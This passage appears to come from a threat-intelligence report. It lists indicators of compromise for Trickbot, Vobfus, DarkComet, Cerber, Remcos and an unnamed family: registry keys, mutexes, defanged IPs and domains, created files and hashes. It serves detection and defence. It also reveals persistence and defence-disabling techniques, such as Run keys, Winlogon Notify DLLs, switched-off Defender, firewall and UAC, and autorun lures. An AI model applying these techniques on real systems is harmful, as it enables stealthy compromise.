<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST 26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE\AUTHORIZEDAPPLICATIONS\LIST
Value Name: C:\Windows\system32\rundll32.exe
25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY 25
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI 11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
Value Name: Impersonate
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
Value Name: Asynchronous
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
Value Name: MaxWait
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
Value Name: DllName
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOEMNI
Value Name: Startup
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: daoemni
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI 9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
Value Name: Impersonate
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
Value Name: Asynchronous
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
Value Name: MaxWait
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
Value Name: DllName
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\DAOMNI
Value Name: Startup
9
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: daomni
9
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG 5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
Value Name: Impersonate
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
Value Name: Asynchronous
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
Value Name: MaxWait
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
Value Name: DllName
5
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\NOTIFY\OMNILG
Value Name: Startup
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: omnilg
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: syncfx
1
MutexesOccurrences
qazwsxedc26
A9ZLO3DAFRVH1WAE25
I106865886KMTX25
IGBIASAARMOAIZ25
J8OSEXAZLIYSQ8J25
LXCV0IMGIXS0RTA125
TXA19EQZP13A6JTR25
VSHBZL6SWAG0C25
A9MTX7ERFAMKLQ25
3G1S91V5ZA5fB56W1
8AZB70HDFK0WOZIZ1
NHO9AZB7HDK0WAZMM1
PJOQT7WD1SAOM1
PSHZ73VLLOAFB1
VHO9AZB7HDK0WAZMM1
VRK1AlIXBJDA5U3A1
<random, matching '[A-Z0-9]{14}'>1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
209[.]85[.]144[.]10025
172[.]217[.]7[.]20621
66[.]199[.]229[.]25121
62[.]75[.]222[.]23521
95[.]211[.]230[.]8616
5[.]104[.]230[.]2005
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
w[.]topfealine[.]com20
l[.]topfealine[.]com14
w[.]netzsoflow[.]net5
n[.]netzsoflow[.]net5
Files and or directories createdOccurrences
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt19
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp19
%LOCALAPPDATA%\daoemni.dll11
%LOCALAPPDATA%\daomni.dll9
%HOMEPATH%\Local Settings\Application Data\daoemni.dll9
%HOMEPATH%\Local Settings\Application Data\daomni.dll7
%LOCALAPPDATA%\omnilg.dll5
%HOMEPATH%\Local Settings\Application Data\omnilg.dll5

File Hashes

05fc7a5cbd0145db5324d216eca44799f3089ce93b9020b1e79a8ffd074373e9 155931a83c112e3b9ec9e53170bc01f00f627149abb4df90506ff9746420ac33 1e781bec2e81a7ea35b3170ba13b8c383a5b34333bfdf5fb8c8fc2da89c79b47 21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7 22becfbe5b71e26f87a6f3525a75af422f9c6903873911290bc20f8869bd0b83 281c088b7ad0f9ed61fbdd599ffb2fdcd934a02ad66fe16b1f40c0e668d203fa 2f2e4c912ae939c550ab3d3d9723d562ceff5cd8f120570bf2ca75975d5dada1 32ea5866bda9068d8c0f10f3c50225823254194f89f841483e6dbad2e8227315 35c4024898d064cea42eebd3efe714e031aeb7a5cd685ff8fc55176762a6c5cc 371abc331dd0d9f9ae078efd7b88a60795e6707f1833f3b31675a7e80b96843f 392a1507494a62ddd1ad5f6659487254930dbba1dbcc98b3d0f34a1ab1852128 3e27faf67ebc38dc381617546201dafb570bcabc12d1d85e2088da56262d80e9 40d378b966cecafc1ba06ddfcbfb644fd408f83792e40109cd810914825d6b06 45f55ec75fdc96afb4133334435b00ea598206c9f00094a8ac42bbc37ff64310 50ab0d77e4368f929287ef0fe486712cc615f9a9c3d74f7767a257d2a677e1ae 551411d65a597560b93c303fc3fd0bde366f4fd767a940a127bc35c0e188255f 56873d0e1082711b6e9f7c0dd230fd76963f5fe977002bba0fdd51d320d2480a 57260f19a6a615eba7325d454666b2a3cf05589e4ffd20eb34c67c4493b613d2 5b144acca2679ab8563e70e789ef0026b25dcc3e2f96e651a504ef35d7cfc1ae 6243725e2486608c0266f4b954487310e8b36f092e5172eacf967a37e12c49c1 6a836249f7f7cdaa5c796248b0684f0ca45bfa524148331b8de2e395d5b0b88a 8127c67786fa6bcf2ba3b891d1619f6b2589027d94d0f8b5f10a005a1dcc4df8 8b7e399b092922ae7972799f1d28d1f40bf2c463ec2ac90d332a816c1b307cbd 9b33901eb6a246891da01fba649a7ea058c10fc5865a6610b4627fa53d3c50cb 9db359f9c8d9e4960e5fb5475c4c873b386a522ef9340153966c841e594ea224
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP




Win.Malware.Trickbot-7394707-1

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Value Name: Blob
3
MutexesOccurrences
Global\316D1C7871E1026
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
117[.]196[.]233[.]10010
94[.]156[.]144[.]745
78[.]24[.]219[.]95
45[.]224[.]214[.]344
103[.]219[.]213[.]1023
212[.]80[.]218[.]1443
216[.]239[.]32[.]212
62[.]109[.]22[.]22
107[.]173[.]240[.]2212
144[.]91[.]80[.]2532
51[.]89[.]115[.]1102
176[.]58[.]123[.]251
116[.]203[.]16[.]951
52[.]55[.]255[.]1131
69[.]195[.]159[.]1581
177[.]154[.]86[.]1451
66[.]85[.]173[.]571
5[.]182[.]210[.]2541
117[.]255[.]221[.]1351
185[.]222[.]202[.]251
195[.]123[.]220[.]1551
117[.]206[.]149[.]291
170[.]84[.]78[.]2241
91[.]108[.]150[.]2131
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ident[.]me1
myexternalip[.]com1
ip[.]anysrc[.]net1
ipecho[.]net1
checkip[.]amazonaws[.]com1
wtfismyip[.]com1
Files and or directories createdOccurrences
%APPDATA%\cmdcache26
%APPDATA%\cmdcache\счв.exe26
%System32%\Tasks\Command cache application26
%ProgramData%\счв.exe26
%APPDATA%\cmdcache\data26
%APPDATA%\cmdcache\settings.ini26
%TEMP%\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt25
%TEMP%\<random, matching '[A-F0-9]{4,5}'>.dmp25

File Hashes

031dba2decd40789db3851d1940275bab98d378ceb410eb661b463adf2410650 07553800c14fabbb3aca709a6d5d7af0b9936504fb3d1406825ba6034e22f97f 0d2da6104e039e429a4bb0f2a27744879a4551cbadb1e4a44de54343a6c0ac6c 218ba8f3d20fbab8eaa94aa7d3aa6ffe417d859bbf6bbd499c1e6211f0292a07 26616609c018bb2081c86a11b1567865a4ee63686eff17f4b7e88b6655ad93eb 2cd5c3baae45b92b8f39f808493a9805f94eed3847b94c853bfb160217225887 2da40b82795dff861dd4bf9025b4fd659e398d894df20ef399c1960fe92de323 334aafa1b9ac0f0d94f690a25ad5841e732de6c0609704e838e8c8ad8986a207 339c9866157b0f51d0fe6c644cd8b485672fdbf16ad5244ceaa7b4eab9d0fd56 33da9747569d5cfa3e42d8a98b8cb941829905cac809428de49e9d011372b3be 3476f50e527ab1558f8a12b20a6d0394045c98b7b352f9703499c54ac13b526a 38548798cfcc55fc8200d3f3482d9eb7eafc14feda2b88b22d143c4fec75a175 3d9bb460763687a31c360beb958abae1a5e10add4fad3b0a9e3fb70aa3803241 3e1762697fe5f1996a8cd224a97bfd47fc2578ac1950d5e177cc17edc4fa9094 4766ae5c1ffdbf142e5c7df792654f591c1ef4df1e7775484d458c2b8237312a 4793182f8a55a7d2df459ea2ef2ed27835bfe43648d78bbe540ecfe9185f4380 48f273faec8a9236fadadcd0b88cc416eab9c4c40b064742213c1e5ed24cc105 4b3ff0afe6f834a9c05354fd2089662e670e9203b864969e0d67bb957af37c43 4cfabac70d45aa70f7e129fcf234ebf84e0edb950380bacf0008616d8059601b 53677c31b06dbf686f019dad8465876ae4e757adf186d02d60a5194106ee20da 5441d28936218f078a094e4b03a60db5f06a890f02ebbbabbf2e4345ef3ed05a 5641e7f156339b3c2d624972d9eea74910e39f0620aed2eadff1fa0635137541 58d92ae7cacfadf7ca36fbabebfa721299c4a828f81707290416639919f0fb20 5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211 5b80b61034467babade5a004fab79adb3d9f18416345c1cdbe6ca0776c9c9513
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSAThis has coverage

Screenshots of Detection

AMP




Win.Worm.Vobfus-7395002-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: ShowSuperHidden
26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU 26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\AU
Value Name: NoAutoUpdate
26
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ciiti
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: supej
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: zauuca
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: yxyom
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wznoid
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: qousu
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jiigio
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bmjiif
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: ryhiy
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: caodaap
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: viean
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: beoal
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fiiisep
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: fuafoop
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: juuso
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: peaceit
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mbnur
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: zoelie
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: teuemar
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: jomol
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: yiozaot
1
MutexesOccurrences
A26
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]11[.]56[.]4826
46[.]166[.]182[.]11513
37[.]48[.]65[.]14811
64[.]32[.]8[.]677
207[.]244[.]67[.]214/314
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ns1[.]anytime2[.]net26
ns1[.]anytime3[.]net26
ns1[.]anytime3[.]org26
ns1[.]anytime2[.]com26
ns1[.]anytime4[.]com26
ns1[.]anytime2[.]org26
ns1[.]anytime1[.]net26
ns1[.]anytime1[.]org26
ns1[.]anytime1[.]com26
Files and or directories createdOccurrences
\autorun.inf26
\System Volume Information.exe26
\$RECYCLE.BIN.exe26
\Secret.exe26
\Passwords.exe26
\Porn.exe26
\Sexy.exe26
E:\autorun.inf26
E:\$RECYCLE.BIN.exe26
E:\Passwords.exe26
E:\Porn.exe26
E:\Secret.exe26
E:\Sexy.exe26
E:\System Volume Information.exe26
E:\x.mpeg26
%HOMEPATH%26
%HOMEPATH%\Passwords.exe26
%HOMEPATH%\Porn.exe26
%HOMEPATH%\Secret.exe26
%HOMEPATH%\Sexy.exe26
%HOMEPATH%\c26
%HOMEPATH%\c\Passwords.exe26
%HOMEPATH%\c\Porn.exe26
%HOMEPATH%\c\Secret.exe26
%HOMEPATH%\c\Sexy.exe26
*See JSON for more IOCs

File Hashes

0114132de55fe3391d2ffe1eb2235af64538e704a5d39a7c12a5242b26feff60 024c44316844dd33ee87876a1acf6b823b30f97b8f9b2aa593289df21b0ec1d7 056bf3cca6f0cd4e41ad01e0eb4700bee0271c2bb3334642784920529e2554de 07ee7ffcf647257d1293ad9826c82fc09398f657092c25b21169f87fa5a7c9d4 08169078f447a9671714276fd75f906cd349fb720001a77d78bef56b9e35a233 081aabf461e76026a4b5ce622d7dea97bd5c69bd7f6291bc69325ee9e1b2478b 082ee719168ea7be341b1303d4e62fe30007af27470e269a63aa0b1098e7d488 084b2c416ebeb7c01a099604458bc0851f1e1e8b2f230522898cf4084c803f15 0a1e200b0c26beab5775cfa61c2639ea27157e46781e70cbd78a4b19232b632b 0ad7fb766799dd2f438ba70821e2c7f6b2e08c524fd750b34a6209ab8ac3d480 0b11ae767b606de45c93913ce84153b226eae42d035871a9955f19c4cbb46c7a 0bf91f7b0d81a825f042006243db69eb23d52726c19b335ad42e188c53616d99 0c5f7e0d447a0f9445888ba803a9c6bb223bdee7d982be2f833d6184e754b7b0 0e323827671fd25c7f89c594618623916a4dc60221f405a3f2bf7df0275e4e0d 0eb69de315990b07cdc4e6472f7b1a178412d9730766fddb596bddf5b2576ed1 1396cae157a806641cb34122f34c22b4dc995028686f6a082725e4e335e60aed 13a7e9c873e5e108d28acca607b1689f391c1036db6d977f8602908046ca4739 148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5 156452ee7c520ac7ef66233c06b2d9bb8faa3c119e9ae697a53695a7f10c3fa3 15b5879a31b9e41872a13caefbff2bc7e4b672beb19a6fbc3c5b5a38774cc13d 16fa24d44c523e35c4c37fc149647d7e6c21d090a047127fc8d68fc6b9ad8a42 1713907f8ca3dc61f966a367d1d65a4dc13e525fc8ce091b2147d3665a3c0c23 193491d849129d8286edd480622bbe6da83f551d6cd8d3eb16c3cc38c21eeacb 1a59da8f0388e798d4ade89f7c880166b72ad576cc87a883568d614df2d0529d 1b1de63ef24f88d5350acd0909ed76b0ee71c7fa327a715bb1ae554feb33837b
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSAThis has coverage

Screenshots of Detection

AMP




Win.Malware.DarkComet-7395004-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\DC3_FEXEC 13
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
12
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Driver
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: RealtekHD
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
2
MutexesOccurrences
DC_MUTEX-RL28VNV3
DCMUTEX1
DC_MUTEX-JG8JLJL1
DC_MUTEX-M79BVMN1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
lolmands[.]chickenkiller[.]com4
Files and or directories createdOccurrences
%APPDATA%\MSDCSC7
%APPDATA%\MSDCSC\driver7
%APPDATA%\dclogs4
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC3
%ProgramData%\Microsoft\Windows\Start Menu\MSDCSC\RealtekHD.exe3
\Documents and Settings\All Users\Start Menu\MSDCSC\RealtekHD.exe3
%HOMEPATH%\My Documents\MSDCSC\msdcsc.exe2
%HOMEPATH%\Documents\MSDCSC2
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe2
%TEMP%\RESIM 1.PNG1
%TEMP%\~PI26.tmp1
%TEMP%\~PI85.tmp1

File Hashes

0316a484966a555a7e369cf49423da28c7cba45bb38d031386ad1e98c7730ed0 30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619 3a44d9ae2b5508869df06bbf3dc0750f8e4cd8a7a827c95cd24f98966bbbfa38 48d15953b1c2f1e314a6ae3945ccbfd9b3e0fe2d40eea09c8d5f379b07f70866 5027bea06d7037f478ddcfd932cc82f682612e147f00d34d47cbf644453b74df 6289734ecf82dc9496402d9ceae7308819c4bbbb5d85642e8dc5108e8a08c32f 65e95281868c80b645d0276515b8b54fab52fe031a85b96c3e1d29148546bcb4 6c6483db05cbc3e863e3231405f66bc764930e5348800780d50bd1ccf1f869c4 74d2e08ab92859332efc3f97c0ef872979820527cc994c3d4160dd2da4add8e7 a44d66aebc02d8d612038c33bd397bf64097da98676b49315c74b79dd449b142 a7c7b756104d1a98a9daa80a7a591dab8cd210be1cf4a187363e42c23abc5856 be324c43b4b0a4f607e60db1926f4eca349fbb2fb6250da3337f7e94d1ea66c8 f43789df8769817412591e561390f06f9ae94b8047b0afd5b5c74170109729e8 f93f80520ccbba8fa35deb75f50ceba2f54b1ef52589b0c072248786bcef78b0 fa45ff72c498d1af84a96317ecb71a96bd608799d529ae8334d83928dff7b970

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP




Win.Ransomware.Cerber-7395321-0

Indicators of Compromise

Registry KeysOccurrences
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER 16
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: api-PQEC
5
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 5
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}
3
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}
3
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5
Value Name: Client
3
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
2
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}16
shell.{<random GUID>}11
{<random GUID>}5
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}3
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}3
Local\{B1443895-5CF6-0B1E-EE75-506F02798413}3
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
178[.]128[.]255[.]17916
178[.]33[.]158[.]0/2716
178[.]33[.]159[.]0/2716
178[.]33[.]160[.]0/2516
104[.]24[.]104[.]25413
104[.]24[.]105[.]25411
34[.]206[.]50[.]2288
54[.]164[.]0[.]556
208[.]67[.]222[.]2223
172[.]217[.]7[.]2062
86[.]105[.]1[.]112
172[.]217[.]11[.]461
46[.]165[.]221[.]1541
91[.]195[.]240[.]131
195[.]201[.]179[.]2071
192[.]3[.]8[.]2181
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com16
bitaps[.]com16
chain[.]so16
btc[.]blockr[.]io16
bc-prod-web-lb-430045627[.]us-east-1[.]elb[.]amazonaws[.]com11
resolver1[.]opendns[.]com3
222[.]222[.]67[.]208[.]in-addr[.]arpa3
myip[.]opendns[.]com3
wdwefwefwwfewdefewfwefw[.]onion2
ahrkvtgc[.]com1
fhvkufnnrlyfvx[.]com1
shebkucvrunporc[.]com1
hd63ueor8473y[.]com1
qegdtnvuanlyid[.]com1
gcijrxipe[.]com1
ogltynjmtfiu[.]com1
rlkeqcsygmmglv[.]com1
wglxvkpybhnxhfv[.]com1
aynycxbgodmwi[.]com1
uahvwkjphhklqigod[.]com1
en[.]voltster12v[.]com1
cloud[.]pathwaystopromise[.]info1
Files and or directories createdOccurrences
%TEMP%\d19ab98916
%TEMP%\d19ab989\4710.tmp16
%TEMP%\d19ab989\a35f.tmp16
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.tmp16
%TEMP%\tmp<random, matching [A-F0-9]{1,4}>.bmp16
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.txt16
<dir>\_R_E_A_D___T_H_I_S___<random, matching '[A-F0-9]{4,8}'>_.hta16
<dir>\<random, matching [A-Z0-9\-]{10}.[A-F0-9]{4}> (copy)11

File Hashes

00fd6d5030b6f36f2acef17f933bf87a5e83104e86edc18467318362fe41bda0 0db052f343bb2c323603fd34eea55262f5448450feaf0dbb03e77da1d1da204e 1beb4d8646023322d8eefba6bee5d899f375bd099050367e8af5321eda512db5 1e78866a82b6016b280f4935ab6aa8e6d59456c5fdb4900ef456cb6216fba878 2766aa41ce912acac61bc342873b1d016c016780600846b77ccee98eaea0a0c1 316c4f6ce0478622772c16aa1821297569a27d52a8ab65262bc1702e864d3cff 367afe107f332d7fd9676b75a76624a2378758104316278a28984ba1815073b2 36bee89b83bc3b628abb726b4530a7fda8b86448594543532ec303f659cd1c1d 36f70b90e9ef4c34440e13c064d05dc0996debd74a7361109532bfda65108ab6 382d8c432cf11339a41b6c0371a226b7567620c6440b0ebdf7dc1610db4ec3c4 38bc3877ec4f87307ccb3d23dc7ea58b117fccfa1ccba938fa9dcff4bb956fe2 4a2803f8ddf258eb4d41ff15f617307cc6eda54bd4e635b0314c9706cff9007e 4b9c203a3f4a7129d0701c5f3e8266d217c836b497c7acf762ad7f8eab508349 4bf2851749232054a7f08faa294520d3bf372b84eb5d20707add176acb1e9aa6 54852be80e90db1d2550128bdf82028befcdf1340da2a1add061e7f6027eb272 552a32a57b59b7498a79f187d2cbfdf7c797395024392b7f76d7b1fff94fea8b 576a3ddc924aea581818f397bca1fe1a3788f892d81b8a2287c03566bc7e6242 5d2e3adf40ec1ae0f6032213a8bb27be9eaf5ae99a6f09239088e8c47944ed02 7275da6b777a1c5c9392766d7fec3c4f0b07e93af161d11b7da000e6157178b0 73796be2c91ffba6b1981860fdc79f7862bbe4b5dd890a42f3d1f8cd38530001 7420f8c4f266ebd29b867ef980309bfe8a1d8845f7683e6f8db734c5812eb5e8 89fc2e256c70fb0235ebb0a9daa3f096ba7722fd06b7b0866a1e87b1ea003f79 a04e9bf2aed6eef853c5a5f2ce6131963cb7cd15971c02e6f2afa18846737e74 a508a738cc8d633613641680ca3a7df98be4fa3d6b8f28a16904ba7aa600b89c ad4a8230c0a8d5deb3d8253ef0e2a9c41531eb1560e538ef8cb1a5ff56e7cb27
*See JSON for more IOCs

Coverage

ProductProtection
AMPThis has coverage
Cloudlock N/A
CWSThis has coverage
Email SecurityThis has coverage
Network SecurityThis has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WSAThis has coverage

Screenshots of Detection

AMP



Umbrella




Malware





Win.Dropper.Remcos-7395733-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\LOCAL APPWIZARD-GENERATED APPLICATIONS 24
